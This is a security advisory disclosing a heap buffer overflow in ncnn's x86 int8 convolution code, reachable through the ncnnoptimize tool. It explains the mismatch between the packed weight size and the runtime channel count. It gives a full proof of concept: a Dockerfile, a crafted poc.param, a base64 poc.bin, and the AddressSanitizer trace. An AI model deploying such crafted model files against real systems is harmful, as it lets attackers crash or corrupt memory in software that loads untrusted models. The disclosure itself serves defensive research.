Heap Buffer Overflow in Int8 Model Optimization
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/gemm_int8.h:13824 in gemm_transB_packed_tile_int8
Sanitizer verdict: heap-buffer-overflow
Summary
For int8 convolutions the x86 backend sizes the packed weight buffer from the serialized weight_data_size but derives the GEMM reduction length K from the runtime tensor's channel count. A .param/.bin pair that makes the two disagree drives gemm_transB_packed_tile_int8 to load tile data far past the packed-weight allocation. The confirmed entry point is tools/ncnnoptimize: the pipeline is built during Net::load_model at tools/ncnnoptimize.cpp:2797, and the layer executes during ModelWriter::shape_inference(), which aborts the tool.
Detail
The untrusted field is Convolution parameter key 6, weight_data_size, combined with key 8 (int8_scale_term) to reach the int8 path and the Input layer's declared channel count (key 2). Convolution_x86::create_pipeline_int8_x86 divides weight_data_size down to a channel depth and transforms the kernel for that depth; the forward pass recomputes the same quantity from the bottom blob:
// src/layer/x86/convolution_x86.cpp:955
const int maxk = kernel_w * kernel_h;
const int num_input = weight_data_size / maxk / num_output;
// src/layer/x86/convolution_im2col_gemm_int8.h:2644
const int M = outch;
const int K = inch * maxk;
// src/layer/x86/convolution_im2col_gemm_int8.h:4567
const int M = top_blob.c * top_blob.elempack;
const int N = top_blob.w * top_blob.h;
const int K = bottom_blob.c * bottom_blob.elempack * maxk;
// src/layer/x86/convolution_im2col_gemm_int8.h:4621
for (int k = 0; k < K; k += TILE_K)
{
const int max_kk = std::min((K - k), TILE_K);
const Mat AT_tile = AT.channel(i / TILE_M).row_range(k / TILE_K, 1);
convolution_im2col_gemm_transform_kernel_int8 allocates AT with (K + TILE_K - 1) / TILE_K rows using the K derived from inch. convolution_im2col_gemm_int8 then walks k over its own, much larger K and calls AT.channel(...).row_range(k / TILE_K, 1), which is unchecked pointer arithmetic against AT's row stride.
The PoC declares Input data 0 1 data 0=1 1=1 2=1024 and Convolution conv 1 1 data out 0=4 1=1 5=0 6=4 8=1. num_input is computed as 4 / 1 / 4 = 1, so the packed-weight buffer covers K = 1 and lands as the 1348-byte region in the ASan report. At forward time bottom_blob.c * elempack * maxk is 1024, so the tile loop issues hundreds of iterations against a buffer holding one TILE_K row. AT_tile walks past the allocation, and _mm_loadu_si128((const __m128i*)pA) in the AVX512-VNNI accumulation at src/layer/x86/gemm_int8.h:13824 performs the 16-byte read that AddressSanitizer catches four bytes short of the region end at 0x51b0000005c4. The channel count in the .param is entirely attacker-chosen, so the distance walked past the buffer is too.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-int8-model-optimization && cd ncnn-poc-heap-buffer-overflow-in-int8-model-optimization
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'EOF'
7767517
2 2
Input data 0 1 data 0=1 1=1 2=1024
Convolution conv 1 1 data out 0=4 1=1 5=0 6=4 8=1
EOF
base64 -d > poc.bin <<'EOF'
OEsNAAECAwQAAIA/AACAPwAAgD8AAIA/AACAPw==
EOF
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param poc.bin out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x51b0000005c0 at pc 0x5da504c6627f bp 0x7ffcfea22e70 sp 0x7ffcfea22e60
READ of size 16 at 0x51b0000005c0 thread T0
#0 0x5da504c6627e in _mm_loadu_si128(long long __vector(2) const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/emmintrin.h:706
#1 0x5da504c6627e in gemm_transB_packed_tile_int8 /ncnn/src/layer/x86/gemm_int8.h:13824
#2 0x5da504c73507 in ncnn::gemm_transB_packed_tile_int8_avx512vnni(ncnn::Mat const&, ncnn::Mat const&, ncnn::Mat&, int, int, int, int, int, int) /ncnn/src/layer/x86/gemm_x86_avx512vnni.cpp:66
#3 0x5da503e6f5a6 in gemm_transB_packed_tile_int8 /ncnn/src/layer/x86/gemm_int8.h:11880
#4 0x5da5040955e1 in ncnn::Gemm_x86_avx512_utility::gemm_transB_packed_tile_int8(ncnn::Mat const&, ncnn::Mat const&, ncnn::Mat&, int, int, int, int, int, int) /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:8855
#5 0x5da4fe590baf in convolution_gemm_transB_packed_tile_int8 /ncnn/src/layer/x86/convolution_im2col_gemm_int8.h:58
#6 0x5da4fe5e746c in convolution_im2col_gemm_int8 /ncnn/src/layer/x86/convolution_im2col_gemm_int8.h:4629
#7 0x5da4fe78cf00 in ncnn::Convolution_x86_avx512::forward_int8_x86(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/convolution_x86_avx512.cpp:1117
#8 0x5da4fe7761af in ncnn::Convolution_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/convolution_x86_avx512.cpp:543
#9 0x5da4fd944f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#10 0x5da4fd936b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#11 0x5da4fd9969e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#12 0x5da4fd8283c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#13 0x5da4fd8a5eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#14 0x7ef21712a1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#15 0x7ef21712a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#16 0x5da4fd825624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x51b0000005c4 is located 0 bytes after 1348-byte region [0x51b000000080,0x51b0000005c4)
allocated by thread T0 here:
#0 0x7ef2177a3f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x5da4fd8fa433 in fastMalloc /ncnn/src/allocator.h:62
#2 0x5da4fd8fa433 in ncnn::Mat::create(int, int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:583
#3 0x5da4fe5aad42 in convolution_im2col_gemm_transform_kernel_int8 /ncnn/src/layer/x86/convolution_im2col_gemm_int8.h:2712
#4 0x5da4fe789e00 in ncnn::Convolution_x86_avx512::create_pipeline_int8_x86(ncnn::Option const&) /ncnn/build/src/layer/x86/convolution_x86_avx512.cpp:969
#5 0x5da4fe76c7ce in ncnn::Convolution_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/convolution_x86_avx512.cpp:290
#6 0x5da4fd991c96 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2094
#7 0x5da4fd99290a in ncnn::Net::load_model(_IO_FILE*) /ncnn/src/net.cpp:2257
#8 0x5da4fd992c91 in ncnn::Net::load_model(char const*) /ncnn/src/net.cpp:2292
#9 0x5da4fd8a5caf in main /ncnn/tools/ncnnoptimize.cpp:2797
#10 0x7ef21712a1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#11 0x7ef21712a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#12 0x5da4fd825624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/13/include/emmintrin.h:706 in _mm_loadu_si128(long long __vector(2) const*)
Credit
Zheng Yu @ DepthFirst